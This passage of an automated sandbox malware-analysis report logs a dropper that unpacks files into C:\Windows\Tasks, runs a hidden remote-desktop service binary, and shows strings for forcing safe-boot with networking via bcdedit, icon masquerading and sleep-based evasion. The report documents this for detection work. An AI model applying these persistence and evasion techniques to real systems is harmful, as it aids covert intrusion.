                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DDC21 push rsp; ret 25_2_00007FF67E7DDC23
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7F8CF9 push 8B481074h; iretd 25_2_00007FF67E7F8CFF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E12EF push rbp; iretd 25_2_00007FF67E7E12F0

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\WPSela.LSZr7VJump to dropped file
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7VJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\WPSela.LSZr7VJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\id2rlx.MxYNRdJump to dropped file
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7VJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\id2rlx.MxYNRdJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\WPSela.LSZr7VJump to dropped file
                          Source: sync_browser.exe.6.drBinary or memory string: bcdedit.exe
                          Source: sync_browser.exe.6.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: WPSela.LSZr7V.2.drBinary or memory string: bcdedit.exe
                          Source: WPSela.LSZr7V.2.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: WPSela.LSZr7V.0.drBinary or memory string: bcdedit.exe
                          Source: WPSela.LSZr7V.0.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E8177F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,22_2_00007FF67E8177F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E817750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,22_2_00007FF67E817750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E817F50 GetPrivateProfileIntA,22_2_00007FF67E817F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E8178E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,22_2_00007FF67E8178E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E817E10 GetPrivateProfileIntA,22_2_00007FF67E817E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E817D50 GetPrivateProfileIntA,22_2_00007FF67E817D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E817650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,22_2_00007FF67E817650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E817EB0 GetPrivateProfileIntA,22_2_00007FF67E817EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E817BD0 GetPrivateProfileIntA,22_2_00007FF67E817BD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E817C90 GetPrivateProfileIntA,22_2_00007FF67E817C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7CE1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat22_2_00007FF67E7CE1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C81AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin22_2_00007FF67E7C81AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E819A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,22_2_00007FF67E819A40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E8177F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,25_2_00007FF67E8177F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E817750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,25_2_00007FF67E817750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E817F50 GetPrivateProfileIntA,25_2_00007FF67E817F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E8178E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,25_2_00007FF67E8178E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E817E10 GetPrivateProfileIntA,25_2_00007FF67E817E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E817D50 GetPrivateProfileIntA,25_2_00007FF67E817D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E817650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,25_2_00007FF67E817650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E817EB0 GetPrivateProfileIntA,25_2_00007FF67E817EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E817BD0 GetPrivateProfileIntA,25_2_00007FF67E817BD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E817C90 GetPrivateProfileIntA,25_2_00007FF67E817C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7CE1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat25_2_00007FF67E7CE1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C81AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin25_2_00007FF67E7C81AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E819A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,25_2_00007FF67E819A40
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\0271695705143540Jump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,22_2_00007FF67E7F48B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7F48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,25_2_00007FF67E7F48B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F3E20 OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,LoadLibraryA,GetProcAddress,GetStockObject,RegisterClassExA,SetEvent,CreateWindowExA,SetTimer,SetWindowLongPtrA,SetClipboardViewer,CreateThread,CloseHandle,GetModuleFileNameA,GetModuleFileNameA,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetEvent,PeekMessageA,Sleep,CreateRectRgn,CombineRgn,DeleteObject,free,SetEvent,SetEvent,SetEvent,TranslateMessage,DispatchMessageA,WaitMessage,DestroyWindow,DestroyWindow,SetEvent,KillTimer,FreeLibrary,FreeLibrary,FreeLibrary,SetThreadDesktop,CloseDesktop,22_2_00007FF67E7F3E20
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E829BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,22_2_00007FF67E829BC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,22_2_00007FF67E7C9D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,25_2_00007FF67E7C9D00
                          Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 421Jump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeWindow / User API: threadDelayed 1348
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 359
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 368
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 369
                          Source: C:\Windows\Tasks\sync_browser.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_22-23860
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Windows\Tasks\sync_browser.exeAPI coverage: 3.3 %
                          Source: C:\Windows\Tasks\sync_browser.exeAPI coverage: 1.1 %
                          Source: C:\Windows\Tasks\sync_browser.exe TID: 4844Thread sleep time: -134800s >= -30000s
